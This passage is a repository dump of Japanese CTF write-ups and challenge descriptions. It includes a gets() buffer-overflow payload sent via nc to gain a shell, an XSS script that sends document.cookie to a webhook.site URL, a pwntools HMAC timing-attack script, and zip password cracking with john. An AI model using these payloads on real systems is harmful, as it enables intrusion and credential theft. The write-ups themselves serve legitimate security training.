stripped\n```\n\nIDAを使って処理の流れを調べる。\n\n![](img/2020-11-08-01-39-21.png)\n\n`gets()`のバッファーオーバーフローの脆弱性をつき、`cmp`で`[rbp+var_8]`を`0FACADEh`に一致させれば良さそう。\n\nそのために、どのくらい文字列を送れば`[rbp+var_8]`を書き換えられるのか調べてみる。\n\nまずは`gets()`まで進む。\n\n```GDB\ngdb-peda$ \n[----------------------------------registers-----------------------------------]\nRAX: 0x0 \nRBX: 0x555555554720 (<__libc_csu_init>:\tpush r15)\nRCX: 0x7ffff7ed41e7 (<__GI___libc_write+23>:\tcmp rax,0xfffffffffffff000)\nRDX: 0x0 \nRSI: 0x5555557562a0 (\"This is the only one\\n\")\nRDI: 0x7fffffffddf0 --> 0x1 \nRBP: 0x7fffffffde30 --> 0x0 \nRSP: 0x7fffffffddf0 --> 0x1 \nRIP: 0x5555555546ea (<main+32>:\tcall 0x5555555545a0 <gets@plt>)\nR8 : 0x15 \nR9 : 0x7c ('|')\nR10: 0x7ffff7faebe0 --> 0x5555557566a0 --> 0x0 \nR11: 0x246 \nR12: 0x5555555545c0 (<_start>:\txor ebp,ebp)\nR13: 0x7fffffffdf20 --> 0x1 \nR14: 0x0 \nR15: 0x0\nEFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)\n[-------------------------------------code-------------------------------------]\n 0x5555555546de <main+20>:\tlea rax,[rbp-0x40]\n 0x5555555546e2 <main+24>:\tmov rdi,rax\n 0x5555555546e5 <main+27>:\tmov eax,0x0\n=> 0x5555555546ea <main+32>:\tcall 0x5555555545a0 <gets@plt>\n 0x5555555546ef <main+37>:\tcmp DWORD PTR [rbp-0x4],0xfacade\n 0x5555555546f6 <main+44>:\tjne 0x555555554704 <main+58>\n 0x5555555546f8 <main+46>:\tlea rdi,[rip+0xba] # 0x5555555547b9\n 0x5555555546ff <main+53>:\tcall 0x555555554590 <system@plt>\nGuessed arguments:\narg[0]: 0x7fffffffddf0 --> 0x1 \n[------------------------------------stack-------------------------------------]\n0000| 0x7fffffffddf0 --> 0x1 \n0008| 0x7fffffffddf8 --> 0x55555555476d (<__libc_csu_init+77>:\tadd rbx,0x1)\n0016| 0x7fffffffde00 --> 0x7ffff7fb3fc8 --> 0x0 \n0024| 0x7fffffffde08 --> 0x555555554720 (<__libc_csu_init>:\tpush r15)\n0032| 0x7fffffffde10 --> 0x0 \n0040| 0x7fffffffde18 --> 0x5555555545c0 (<_start>:\txor ebp,ebp)\n0048| 0x7fffffffde20 --> 0x7fffffffdf20 --> 0x1 \n0056| 0x7fffffffde28 --> 0x0 \n[------------------------------------------------------------------------------]\nLegend: code, data, rodata, value\n0x00005555555546ea in main ()\n```\n\n次に、`pattc`で生成した文字列を送り込む。\n\n```GDB\ngdb-peda$ pattc 100\n'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'\ngdb-peda$ ni\nAAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\n[----------------------------------registers-----------------------------------]\nRAX: 0x7fffffffddf0 (\"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\nRBX: 0x555555554720 (<__libc_csu_init>:\tpush r15)\nRCX: 0x7ffff7fae980 --> 0xfbad2288 \nRDX: 0x0 \nRSI: 0x5555557566b1 (\"AA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\\n\")\nRDI: 0x7ffff7fb14d0 --> 0x0 \nRBP: 0x7fffffffde30 (\"AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\nRSP: 0x7fffffffddf0 (\"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\nRIP: 0x5555555546ef (<main+37>:\tcmp DWORD PTR [rbp-0x4],0xfacade)\nR8 : 0x7fffffffddf0 (\"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\nR9 : 0x0 \nR10: 0x7ffff7faebe0 --> 0x555555756ab0 --> 0x0 \nR11: 0x246 \nR12: 0x5555555545c0 (<_start>:\txor ebp,ebp)\nR13: 0x7fffffffdf20 --> 0x1 \nR14: 0x0 \nR15: 0x0\nEFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)\n[-------------------------------------code-------------------------------------]\n 0x5555555546e2 <main+24>:\tmov rdi,rax\n 0x5555555546e5 <main+27>:\tmov eax,0x0\n 0x5555555546ea <main+32>:\tcall 0x5555555545a0 <gets@plt>\n=> 0x5555555546ef <main+37>:\tcmp DWORD PTR [rbp-0x4],0xfacade\n 0x5555555546f6 <main+44>:\tjne 0x555555554704 <main+58>\n 0x5555555546f8 <main+46>:\tlea rdi,[rip+0xba] # 0x5555555547b9\n 0x5555555546ff <main+53>:\tcall 0x555555554590 <system@plt>\n 0x555555554704 <main+58>:\tcmp DWORD PTR [rbp-0x8],0xfacade\n[------------------------------------stack-------------------------------------]\n0000| 0x7fffffffddf0 (\"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0008| 0x7fffffffddf8 (\"ABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0016| 0x7fffffffde00 (\"AACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0024| 0x7fffffffde08 (\"(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0032| 0x7fffffffde10 (\"A)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0040| 0x7fffffffde18 (\"AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0048| 0x7fffffffde20 (\"bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0056| 0x7fffffffde28 (\"AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n[------------------------------------------------------------------------------]\nLegend: code, data, rodata, value\n0x00005555555546ef in main ()\n```\n\n`[rbp-0x4]`の値を見て、オフセットを調べる。\n\n```GDB\ngdb-peda$ x $rbp-0x4\n0x7fffffffde2c:\t\"2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\"\ngdb-peda$ patto 2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\n2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL found at offset: 60\n```\n\nオフセットが60だと分かったので適当な文字で60文字分埋め、`0x00facade`を付け加えたものを送る。\n(リトルエンディアンであることに注意)\n\n```bash\n$ python3 -c \"import sys;sys.stdout.buffer.write(b'A'*60 + b'\\xde\\xca\\xfa\\x00')\" > input\n$ cat input /dev/stdin | nc chal.2020.sunshinectf.org 30000\n```\n\n2行目の標準入力でbashのコマンドが実行できる。\n\n```bash\n$ cat input /dev/stdin | nc chal.2020.sunshinectf.org 30000\nThis is the only one\nls\nls -la\ntotal 36\ndrwxr-xr-x 1 chall_00 chall_00 4096 Nov 7 08:51 .\ndrwxr-xr-x 1 root root 4096 Nov 7 08:51 ..\n-rw-r--r-- 1 chall_00 chall_00 220 Aug 31 2015 .bash_logout\n-rw-r--r-- 1 chall_00 chall_00 3771 Aug 31 2015 .bashrc\n-rw-r--r-- 1 chall_00 chall_00 655 Jul 12 2019 .profile\n-rwxr-xr-x 1 root root 8392 Nov 7 07:49 chall_00\n-rw-r----- 1 root chall_00 35 Nov 7 08:51 flag.txt\n^C\n\n$ cat input /dev/stdin | nc chal.2020.sunshinectf.org 30000\nThis is the only one\n \ncat flag.txt\n```\n\n<!-- sun{burn-it-down-6208bbc96c9ffce4} -->\n\n**[ハマったこと]**\n\npython3系ではバイト文字列の出力方法が違うので注意する。\n\n* https://www.366service.com/jp/qa/a2f0316cea73399d1c68c221ee29fbb7\n\n標準入力が閉じないように`/dev/stdin`をつける。\n\n* http://flag.hatenablog.jp/entry/2017/09/11/225013" }, { "alpha_fraction": 0.7605633735656738, "alphanum_fraction": 0.7957746386528015, "avg_line_length": 27.399999618530273, "blob_id": "d63b348bded3840b098cc0a96b313c961bff54b6", "content_id": "2666eca628a13c02a931796dfd70d55e1c9429fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 186, "license_type": "no_license", "max_line_length": 95, "num_lines": 5, "path": "/2021/WaniCTF21-spring/slow/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "宇宙からメッセージが届きました。(※音量注意!)\n\n[for-slow.zip](https://score.wanictf.org/storage/d3ps2tqhbwpzhwndtz9ggt2r5kwncyac/for-slow.zip)\n\nWriter : takushooo\n" }, { "alpha_fraction": 0.7752808928489685, "alphanum_fraction": 0.7977527976036072, "avg_line_length": 58.66666793823242, "blob_id": "1d52634b801f7d29ae3f2cdb09a78b136e8eede3", "content_id": "5479f835d4a281c9c44750e219784ec88eef890c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 178, "license_type": "no_license", "max_line_length": 154, "num_lines": 3, "path": "/2020/CyberSecurityRumble2020/Cyberwall/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "We had problems with hackers, but now we got a [enterprise firewall system](http://chal.cybersecurityrumble.de:3812/) build by a leading security company.\n\nAuthor: rugo|RedRocket" }, { "alpha_fraction": 0.6877729296684265, "alphanum_fraction": 0.7947598099708557, "avg_line_length": 40.727272033691406, "blob_id": "8c1b7bf1266329b7e50ed4c3aa07553b4975eea9", "content_id": "18062eff588a6b6808d68eca70975107b473b495", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 458, "license_type": "no_license", "max_line_length": 133, "num_lines": 11, "path": "/2021/DiceCTF_2021/Babier_CSP/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "[Baby CSP](https://2020.justctf.team/challenges/14) was too hard for us, try Babier CSP.\n\n[babier-csp.dicec.tf](https://babier-csp.dicec.tf/)\n\n[Admin Bot](https://us-east1-dicegang.cloudfunctions.net/ctf-2021-admin-bot?challenge=babier-csp)\n\nThe admin will set a cookie secret equal to config.secret in index.js.\n\nDownloads\n\n[index.js](https://dicegang.storage.googleapis.com/uploads/12b7c924573d906f2f6abfd5b43618e56c81e1e72fd875a39cfa9cbe0a38a4c5/index.js)" }, { "alpha_fraction": 0.704273521900177, "alphanum_fraction": 0.7333333492279053, "avg_line_length": 20.66666603088379, "blob_id": "22861d859040373cf2485129296b3a06cfff576c", "content_id": "42e1778299eec3d09ccce226f6f2ee68a9ed378b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 717, "license_type": "no_license", "max_line_length": 135, "num_lines": 27, "path": "/2021/redpwnCTF_2021/scissor/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n暗号文`egddagzp_ftue_rxms_iuft_rxms_radymf`と、以下のプログラムが与えられる。\n\n```py\nimport random\n\nkey = random.randint(0, 25)\nalphabet = 'abcdefghijklmnopqrstuvwxyz'\nshifted = alphabet[key:] + alphabet[:key]\ndictionary = dict(zip(alphabet, shifted))\n\nprint(''.join([\n dictionary[c]\n if c in dictionary\n else c\n for c in input()\n]))\n```\n\nランダムな数でローテーションシフトしていることが分かる。\n\nROT14したところ、意味のある英文になった。\n\n* [CyberChef](https://gchq.github.io/CyberChef/#recipe=ROT13(true,true,false,14)&input=ZWdkZGFnenBfZnR1ZV9yeG1zX2l1ZnRfcnhtc19yYWR5bWY)\n\n<!-- flag{surround_this_flag_with_flag_format} -->\n" }, { "alpha_fraction": 0.6404494643211365, "alphanum_fraction": 0.8164793848991394, "avg_line_length": 52.599998474121094, "blob_id": "10490b7bac98293088c4029333f2e555db0fe6c4", "content_id": "7aa6e8ce0bc4e1715428dd9b9f698da7a45610f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 267, "license_type": "no_license", "max_line_length": 207, "num_lines": 5, "path": "/2021/angstromCTF_2021/Im_so_Random/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Aplet's quirky and unique so he made my own [PRNG](https://files.actf.co/a155e414e8cc7e0279ffe40225d7295fda5c2b79116313c2cb8fb8bf22dda70d/chall.py)! It's not like the other PRNGs, its absolutely unbreakable!\n\n`nc crypto.2021.chall.actf.co 21600`\n\nAuthor: EvilMuffinHa" }, { "alpha_fraction": 0.590099036693573, "alphanum_fraction": 0.6455445289611816, "avg_line_length": 9.326530456542969, "blob_id": "7569ccc455509564f952ab6e91b052536e8940a1", "content_id": "a82442e956b2e7a739d8650455234157fe48f117", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 787, "license_type": "no_license", "max_line_length": 47, "num_lines": 49, "path": "/2020/HITCON_CTF_2020/Welcome/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n問題文に指定されている場所へSSH接続する。\n\n```bash\nssh [email protected]\npassword: hitconctf\n```\n\nとりあえず、`ls`コマンドを実行。\n\n```bash\n$ ls\n```\n\n![](img/2020-11-28-11-31-28.png)\n\nアニメーションが流れる。すごい。\n\n`ls`はダメそうなので、ほかのコマンドを試してみる。\n\n```bash\n$ cd /\n/bin/sh: 1: dc: not found\n```\n\n`cd`コマンドが`dc`として認識されていた。\n\nつまり`ls`を入力したいなら`sl`と入力する必要がある。(先ほどのアニメーションはSL?)\n\n```bash\n$ sl\nflag\n```\n\n```bash\n$ tac flag\ncat: galf: No such file or directory\n```\n\n引数も逆から読む。\n\n```bash\n$ tac galf\n```\n\nフラグを入手。\n\n<!-- hitcon{!0202 ftcnoctih ot emoclew} -->" }, { "alpha_fraction": 0.6159420013427734, "alphanum_fraction": 0.727053165435791, "avg_line_length": 26.600000381469727, "blob_id": "1522303f0db04f686b666a42184008ee2512bf2d", "content_id": "ed35941e118c1c8068e7dd53d2f47bf941fece3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 572, "license_type": "no_license", "max_line_length": 110, "num_lines": 15, "path": "/2021/redpwnCTF_2021/pastebin-1/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n[pastebin-1.mc.ax](https://pastebin-1.mc.ax/) にアクセスする。\n\nフォームに`<script>`タグを入れてみたところ実行されたので、XSSができることが分かった。\n\nadminのcookieを抜き取りたいので、以下のスクリプトを入力した先のURLを[Admin bot](https://admin-bot.mc.ax/pastebin-1)に踏んでもらう。\n\n```html\n<script>window.open('https://webhook.site/4786afe9-a094-44b5-bb0b-9be905b53eb0/?q='+document.cookie);</script>\n```\n\n![](img/2021-07-10-15-30-59.png)\n\n<!-- flag{d1dn7_n33d_70_b3_1n_ru57} -->\n" }, { "alpha_fraction": 0.6301887035369873, "alphanum_fraction": 0.6848063468933105, "avg_line_length": 23.44660186767578, "blob_id": "0c8d67f25a61c4d2b110709850afa3f2f27e4249", "content_id": "4443c2e686bad11c9790569bf0179c50260c6149", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5786, "license_type": "no_license", "max_line_length": 179, "num_lines": 206, "path": "/2020/SquareCTF2020/Hash_My_Awesome_Commands/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nGoプログラムのmain関数の中身を見ると、`(command)|(base64)` の形式でを入力すればよいことがわかる。\n\n```go\nvar commands = []string{\n\t\"flag\",\n\t\"debug\",\n}\n```\n\n```go\ninput = strings.TrimSpace(input)\ncomponents := strings.Split(input, \"|\")\nif len(components) < 2 {\n fmt.Println(\"command must contain hmac signature\")\n continue\n}\n\ncommand := components[0]\ncheck, err := base64.StdEncoding.DecodeString(components[1])\nif err != nil {\n fmt.Println(\"hmac must be base64\")\n continue\n}\n\nif !contains(commands, command) {\n fmt.Println(\"invalid command\")\n continue\n}\n```\n\n問題文中の`9W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=`がBase64文字列っぽいので、入力してみる。\n\n```bash\n$ nc challenges.2020.squarectf.com 9020\n\nEnter command: flag|9W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=\ninvalid hmac\n\nEnter command: debug|9W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=\ndebug mode enabled\n-----------DEBUG MODE ENABLED-----------\n\nEnter command: flag|9W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=\ncommand: flag, check: 9W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=\ntook 666178 nanoseconds to verify hmac\ninvalid hmac\n```\n\nどうやら上のBase64文字列がデバッグコマンドを実行するために必要な文字列になっているらしい。\n\n```go\ncheck, err := base64.StdEncoding.DecodeString(components[1])\nif err != nil {\n fmt.Println(\"hmac must be base64\")\n continue\n}\n\nif !hmacWrapper.verifyHmac(command, check) {\n fmt.Println(\"invalid hmac\")\n continue\n}\n```\n\n```go\nfunc (h *HmacVerifier) verifyHmac(message string, check []byte) bool {\n\tstart := time.Now()\n\tmatch := compare(h.codes[message], check)\n\tverifyTime := time.Since(start).Nanoseconds()\n\n\tif debug {\n\t\tfmt.Printf(\"took %d nanoseconds to verify hmac\\n\", verifyTime)\n\t}\n\n\treturn match\n}\n```\n\n`flag|(flagに対応するbase64)`を入力すればフラグが表示されそうだと分かる。\n\nプログラムを読むと`flagに対応するbase64`は、`flag`を`key`でSHA256変換⇒文字列変換⇒base64変換という流れで計算されている。\n\n```\nflag を squarectf で SHA256 変換 (HMAC方式)\n\n 32500c064e1eb1053b70ea0a6edc4eb5bc6ab25d1316b413f35e6f9a44e6a9ac\n\n文字列変換\n\n 2P..N.±.;pê nÜNµ¼j²]..´.ó^o.D橬\n\nBase64変換\n\n MlAMBk4esQU7cOoKbtxOtbxqsl0TFrQT815vmkTmqaw=\n```\n\nもし、keyの中身が`squarectf`なら`flag|MlAMBk4esQU7cOoKbtxOtbxqsl0TFrQT815vmkTmqaw=`と入力すればフラグが得られるということになる。\n\n* [CyberChef](https://gchq.github.io/CyberChef/#recipe=HMAC(%7B'option':'UTF8','string':'squarectf'%7D,'SHA256')From_Charcode('CRLF',16)To_Base64('A-Za-z0-9%2B/%3D')&input=ZmxhZw)\n\nわざわざ`compare`関数内で`time.Sleep`しているので、デバッグモード内で時間を見ることが重要であると推測。バイト列を先頭から比較していく仕組みになっている。\n\n```go\nfunc compare(s1, s2 []byte) bool {\n\tif len(s1) != len(s2) {\n\t\treturn false\n\t}\n\n\tc := make(chan bool)\n\n\t// multi-threaded check to speed up comparison\n\tfor i := 0; i < len(s1); i++ {\n\t\tgo func(i int, co chan<- bool) {\n\t\t\t// avoid race conditions\n\t\t\ttime.Sleep(time.Duration(((500*math.Pow(1.18, float64(i+1)))-500)/0.18) * time.Microsecond)\n\t\t\tco <- s1[i] == s2[i]\n\t\t}(i, c)\n\t}\n\n\tfor i := 0; i < len(s1); i++ {\n\t\tif <-c == false {\n\t\t\treturn false\n\t\t}\n\t}\n\n\treturn true\n}\n```\n\n試しに、debugの成功時と失敗時の時間を計ってみると明らかに時間差があることが確認できた。\n\n```\n$ nc challenges.2020.squarectf.com 9020\nEnter command: debug|9W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=\ndebug mode enabled\n-----------DEBUG MODE ENABLED-----------\n\nEnter command: debug|9W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=\ncommand: debug, check: 9W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=\ntook 552108195 nanoseconds to verify hmac\ndebug mode disabled\n\nEnter command: debug|9W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=\ndebug mode enabled\n-----------DEBUG MODE ENABLED-----------\n\nEnter command: debug|8W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=\ncommand: debug, check: 8W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=\ntook 712276 nanoseconds to verify hmac\ninvalid hmac\n```\n\n時間の情報をもとに1バイト目から順に確定させていくプログラムを作成した。\n\n```py\nfrom pwn import *\nimport base64\nimport struct\nimport re\n\nconn = remote('challenges.2020.squarectf.com',9020)\n\n# debug mode\nconn.recvuntil('Enter command:',drop=True)\nconn.sendline('debug|9W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=')\nconn.recvuntil('Enter command:',drop=True)\n\nresult = [0 for _ in range(2**8)]\n\npayload = b''\n\nfor j in range(1,33):\n\n buf = b'\\x00'*(32-j)\n\n top = [k for k in range(2**8)]\n while len(top) != 1:\n for i in range(2**8):\n if i not in top:\n continue\n data = struct.pack(\"B\",i) # \\x00 - \\xff\n data = payload + data + buf\n b64_data = base64.b64encode(data).decode()\n conn.sendline('flag|' + b64_data)\n conn.recvline()\n msg = conn.recvline().decode() # time info\n varify_time = int(re.sub(r\"\\D\",\"\",msg)) \n result[i] = [varify_time,i]\n print(i,msg,end='') # for debug\n skip = conn.recvuntil('Enter command:',drop=True)\n if(j == 32):\n print(skip) # flag check\n\n sort_result = sorted(result,reverse=True)\n topgroup = [x[1] for x in sort_result][:10] # just in case\n top = [x for x in top if x in topgroup]\n print('top: ', top)\n\n payload += struct.pack(\"B\",top[0])\n print('payload: ', payload)\n```\n\n時間はかかるがフラグを入手。\n\n<!-- flag{d1d_u_t4k3_the_71me_t0_appr3c14t3_my_c0mm4nd5} -->" }, { "alpha_fraction": 0.39715638756752014, "alphanum_fraction": 0.5516587495803833, "avg_line_length": 17.508771896362305, "blob_id": "c713c6b33ed82094fddafa87f2162d87b3aec085", "content_id": "40a8b1b0f8900afcc1fa69c5bf2bb5248c3c417a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1311, "license_type": "no_license", "max_line_length": 83, "num_lines": 57, "path": "/2020/CyberSecurityRumble2020/Hashfun/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のPythonプログラムが与えられる。\n\n```py\nfrom secret import FLAG\n\ndef hashfun(msg):\n digest = []\n for i in range(len(msg) - 4):\n digest.append(ord(msg[i]) ^ ord(msg[i + 4]))\n return digest\n\nprint(hashfun(FLAG))\n# [10, 30, 31, 62, 27, 9, 4, 0, 1, 1, 4, 4, 7, 13, 8, 12, 21, 28, 12, 6, 60]\n```\n\nコメント行部分が出力であると推測できる。\n\n`hashfun()`の動作は以下の通り。\n\n* `ord()`でASCIIコード(10進)に変換\n\n`CSR{flag}` ⇒ `67 83 82 123 102 108 97 103 125`\n\n* 4つ先の文字とXORを計算\n\n`67(C) ^ 102(f) = 37`, \n`83(S) ^ 108(l) = 63`, \n`82(R) ^ 97(a) = 51`, \n`123({) ^ 103(g) = 28`, \n`102(f) ^ 125(}) = 27` \n\n`hashfun('CSR{flag}') = [37, 63, 51, 28, 27]`\n\nつまり、`67(c) ^ ???(?) = 10` の `???`を求められればよい。\n\nXORは2回作用させると元に戻る性質があるので、`10 ^ 67 = ??? = 73(I)` となる。\n\n* [競技プログラミングにおけるXORのTips](https://qiita.com/kuuso1/items/778acaa7011d98a3ff3a)\n\n`FLAG`を求めるプログラムを作成\n\n```py\ndigest = [10, 30, 31, 62, 27, 9, 4, 0, 1, 1, 4, 4, 7, 13, 8, 12, 21, 28, 12, 6, 60]\nchar = 'CSR{'\n\ni = 0\nfor d in digest:\n x = chr(d ^ ord(char[i]))\n char += x\n i += 1\n\nprint(char)\n```\n\n<!-- CSR{IMMERDIESEMATHEMATIK} -->\n" }, { "alpha_fraction": 0.7788944840431213, "alphanum_fraction": 0.7889447212219238, "avg_line_length": 27.571428298950195, "blob_id": "f13ee0a85f4263606fc2f2fa1c9e288707626fe0", "content_id": "8d5bb518bbf545b682e4021708e81bc4bf43428e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 246, "license_type": "no_license", "max_line_length": 89, "num_lines": 7, "path": "/2020/WaniCTF/zero_size_png/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "この画像のサイズは本当に0×0ですか?\n\n[PNG イメージヘッダ(IHDR)](https://www.setsuki.com/hsp/ext/chunk/IHDR.htm)\n\n[dyson.png](https://score.wanictf.org/storage/blhzcdzthleicibsouicbwdxctrnrtgy/dyson.png)\n\nWriter : takushooo" }, { "alpha_fraction": 0.7333333492279053, "alphanum_fraction": 0.7512820363044739, "avg_line_length": 34.45454406738281, "blob_id": "e0bd3ad19de18c98719b8e6f6e46dba79d11f431", "content_id": "8b1eb53d7b8648ee7660b5aae9c624e1b9530821", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 390, "license_type": "no_license", "max_line_length": 229, "num_lines": 11, "path": "/2021/BCACTF_2.0/Cipher_Mishap/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "My Caeser-loving friend decided to send me a text file, but before sending it, his sister, who loves Caps Lock, tampered with the file. Can you help me find out what my friend sent me? Note: the answer must be wrapped in bcactf{}\n\n[text.txt](https://objects.bcactf.com/bcactf2/cipher-mishap/text.txt)\n\nHint 1 of 2\n\nHis sister hates base 10.\n\nHint 2 of 2\n\nMight Y and N relate to Caps Lock?\n" }, { "alpha_fraction": 0.3052631616592407, "alphanum_fraction": 0.7105262875556946, "avg_line_length": 30.66666603088379, "blob_id": "068f94acf1b31a997011f5c40fd72b7b4ae93f0a", "content_id": "f4a3e3acca8f652880488a5f5a6dab2ae7291e3e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 190, "license_type": "no_license", "max_line_length": 90, "num_lines": 6, "path": "/2021/WaniCTF21-spring/execute/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "value = [7941081424088616006, 7311705455698409823, 3560223458505028963, 35295634984951667]\n\nflag = \"\"\nfor v in value:\n flag += bytes.fromhex(hex(v)[2:]).decode('utf-8')[::-1]\nprint(flag)\n" }, { "alpha_fraction": 0.692139744758606, "alphanum_fraction": 0.7445414662361145, "avg_line_length": 21.899999618530273, "blob_id": "e828e162b6c264709358fd819a702e94c68369da", "content_id": "daccfcfae6c79f92e92773ea823040aa9a6f632f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 588, "license_type": "no_license", "max_line_length": 61, "num_lines": 20, "path": "/2021/BCACTF_2.0/Secure_Zip/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nパスワード付きのzipファイルが与えられる。\n\n```bash\n$ zip2john chall.zip > chall_hash\n\n$ john chall_hash --wordlist=rockyou.txt\nUsing default input encoding: UTF-8\nLoaded 1 password hash (PKZIP [32/64])\nWill run 16 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\ndogedoge (chall.zip)\n```\n\njohn the ripper で解析すると、パスワードは`dogedoge`であることが分かった。\n\nzipファイル内のテキストにフラグが書かれていた。\n\n<!-- bcactf{cr4ck1ng_z1p_p455w0rd5_15_fun_a12ca37bdacef7} -->\n" }, { "alpha_fraction": 0.5641025900840759, "alphanum_fraction": 0.7435897588729858, "avg_line_length": 14.399999618530273, "blob_id": "0166d4d4e81efc5277d970049ea952503b8e6659", "content_id": "b30299e3bc17c86979181c8f222e816c82140f20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 78, "license_type": "no_license", "max_line_length": 38, "num_lines": 5, "path": "/2021/RITSEC_CTF_2021/Robots/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Robots are taking over. Find out more.\n\n34.69.61.54:5247\n\nAuthor: f1rehaz4rd\n\n" }, { "alpha_fraction": 0.7666666507720947, "alphanum_fraction": 0.7666666507720947, "avg_line_length": 30, "blob_id": "a96e1450783d96bc11b8bf85bac076b9d6cd5514", "content_id": "ce09ec41de0e6b7544bda0df24766cf4d36ee2b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 30, "license_type": "no_license", "max_line_length": 30, "num_lines": 1, "path": "/2021/Real_World_CTF_3rd/HOME/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "No need to wear a mask at HOME" }, { "alpha_fraction": 0.7729257345199585, "alphanum_fraction": 0.8122270703315735, "avg_line_length": 31.714284896850586, "blob_id": "260967adce3b9202aa6d51ee31b6bdb940ea421f", "content_id": 